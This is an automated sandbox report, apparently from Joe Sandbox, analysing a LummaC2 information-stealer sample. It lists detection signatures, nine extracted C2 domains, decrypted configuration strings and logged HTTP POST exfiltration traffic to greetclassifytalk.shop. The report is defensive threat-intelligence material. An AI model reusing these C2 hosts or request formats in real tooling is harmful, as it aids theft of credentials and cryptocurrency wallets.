Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1431577
MD5:c91f9c9ffa73cd9d586d34f73beee0cd
SHA1:0c6c645322b236944142fdffacbb610906177ee3
SHA256:1b17680574d595b6211da1ca0664113f78cfb0e678c209dd61664d0f99841942
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Detected VMProtect packer
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C91F9C9FFA73CD9D586D34F73BEEE0CD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "greetclassifytalk.shop"], "Build id": "4sxFKu--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: file.exe PID: 7328JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: file.exe PID: 7328JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7328JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              Timestamp:04/25/24-13:33:01.018564
              SID:2052037
              Source Port:49732
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:33:06.114264
              SID:2052037
              Source Port:49737
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:32:58.942006
              SID:2052028
              Source Port:56442
              Destination Port:53
              Protocol:UDP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:33:01.871434
              SID:2052037
              Source Port:49733
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:33:04.680270
              SID:2052037
              Source Port:49736
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:32:59.247616
              SID:2052037
              Source Port:49730
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:33:02.853848
              SID:2052037
              Source Port:49734
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:33:03.855093
              SID:2052037
              Source Port:49735
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:04/25/24-13:33:00.026464
              SID:2052037
              Source Port:49731
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: https://greetclassifytalk.shop/apiAvira URL Cloud: Label: malware
              Source: 0.2.file.exe.cd0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["demonstationfukewko.shop", "liabilitynighstjsko.shop", "alcojoldwograpciw.shop", "incredibleextedwj.shop", "shortsvelventysjo.shop", "shatterbreathepsw.shop", "tolerateilusidjukl.shop", "productivelookewr.shop", "greetclassifytalk.shop"], "Build id": "4sxFKu--"}
              Source: tolerateilusidjukl.shopVirustotal: Detection: 14%Perma Link
              Source: shortsvelventysjo.shopVirustotal: Detection: 16%Perma Link
              Source: incredibleextedwj.shopVirustotal: Detection: 14%Perma Link
              Source: https://greetclassifytalk.shop/apiVirustotal: Detection: 11%Perma Link
              Source: shatterbreathepsw.shopVirustotal: Detection: 17%Perma Link
              Source: productivelookewr.shopVirustotal: Detection: 16%Perma Link
              Source: alcojoldwograpciw.shopVirustotal: Detection: 17%Perma Link
              Source: liabilitynighstjsko.shopVirustotal: Detection: 17%Perma Link
              Source: demonstationfukewko.shopVirustotal: Detection: 18%Perma Link
              Source: file.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: demonstationfukewko.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: liabilitynighstjsko.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: alcojoldwograpciw.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: incredibleextedwj.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: shortsvelventysjo.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: shatterbreathepsw.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: tolerateilusidjukl.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: productivelookewr.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: greetclassifytalk.shop
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1749554472.0000000000D0B000.00000002.00000001.01000000.00000003.sdmpString decryptor: 4sxFKu--
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CE5999 CryptUnprotectData,0_2_00CE5999
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.51.78:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc ebx0_2_00CE42F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00CF2458
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00CEC540
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+04h]0_2_00D057CA
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+04h]0_2_00D059E2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+000000A4h]0_2_00CE4C49
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+08h]0_2_00D03D10
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esp+08h]0_2_00D03D10
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00CF4087
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00CF4084
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_00CDD140
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+70h]0_2_00CF3943
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov esi, ebp0_2_00CD3260
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_00CEF234
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push 00000000h0_2_00CEE451
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+4Ch], 00000000h0_2_00D05412
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_00CEA420
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00CEA420
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx0_2_00CE4596
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx0_2_00CE46E6
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+10h]0_2_00CEF640
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc eax0_2_00CE37C9
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+4Ch]0_2_00CF271D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebx+esi+02h], 0000h0_2_00CEA8C0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00CFF890
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00CF58A2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00CF58A2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [edx]0_2_00CEF828
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00CF59CD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00CF59D2
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], cl0_2_00CF594F
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [esi+ebx+01h], 00000000h0_2_00CECAEC
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then inc ebx0_2_00CDFA49
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esi+000000E0h]0_2_00CE1A44
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebp, byte ptr [eax+edx]0_2_00D01A70
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_00CF1CC7
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00CE6CDD
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+30h]0_2_00CF4CB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+000000C0h]0_2_00CE3C46
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx0_2_00D07C45
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp edx0_2_00D07C47
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [esp+00000084h]0_2_00CE5D7D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+000005E0h]0_2_00CE3E4A
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, dword ptr [esi+04h]0_2_00CDEF2D

              Networking

              barindex
              Source: TrafficSnort IDS: 2052028 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (greetclassifytalk .shop) 192.168.2.4:56442 -> 1.1.1.1:53
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49730 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49731 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49732 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49733 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49734 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49735 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49736 -> 104.21.51.78:443
              Source: TrafficSnort IDS: 2052037 ET TROJAN Observed Lumma Stealer Related Domain (greetclassifytalk .shop in TLS SNI) 192.168.2.4:49737 -> 104.21.51.78:443
              Source: Malware configuration extractorURLs: demonstationfukewko.shop
              Source: Malware configuration extractorURLs: liabilitynighstjsko.shop
              Source: Malware configuration extractorURLs: alcojoldwograpciw.shop
              Source: Malware configuration extractorURLs: incredibleextedwj.shop
              Source: Malware configuration extractorURLs: shortsvelventysjo.shop
              Source: Malware configuration extractorURLs: shatterbreathepsw.shop
              Source: Malware configuration extractorURLs: tolerateilusidjukl.shop
              Source: Malware configuration extractorURLs: productivelookewr.shop
              Source: Malware configuration extractorURLs: greetclassifytalk.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5433Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1378Host: greetclassifytalk.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569440Host: greetclassifytalk.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: greetclassifytalk.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: greetclassifytalk.shop
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.1695213060.0000000003892000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1686225301.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676472111.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1686178285.000000000387F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748141502.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676279859.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/
              Source: file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748141502.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/G
              Source: file.exe, 00000000.00000003.1686142545.000000000387F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/Tx=
              Source: file.exe, 00000000.00000002.1749033743.0000000000A10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748141502.0000000000A0F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/US5i
              Source: file.exe, 00000000.00000003.1676279859.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1748878765.0000000000981000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1748878765.0000000000993000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1686178285.000000000387F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1747790604.0000000000980000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1748878765.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676279859.00000000009BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/api
              Source: file.exe, 00000000.00000003.1686225301.0000000000A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/apiO
              Source: file.exe, 00000000.00000003.1676472111.00000000009E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greetclassifytalk.shop/ziRL
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.1676781567.00000000038CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1696211713.000000000399C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1676781567.00000000038CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: file.exe, 00000000.00000003.1676781567.00000000038CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: file.exe, 00000000.00000003.1677888710.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677731818.00000000038B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1677230741.00000000038B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1696690146.0000000003876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
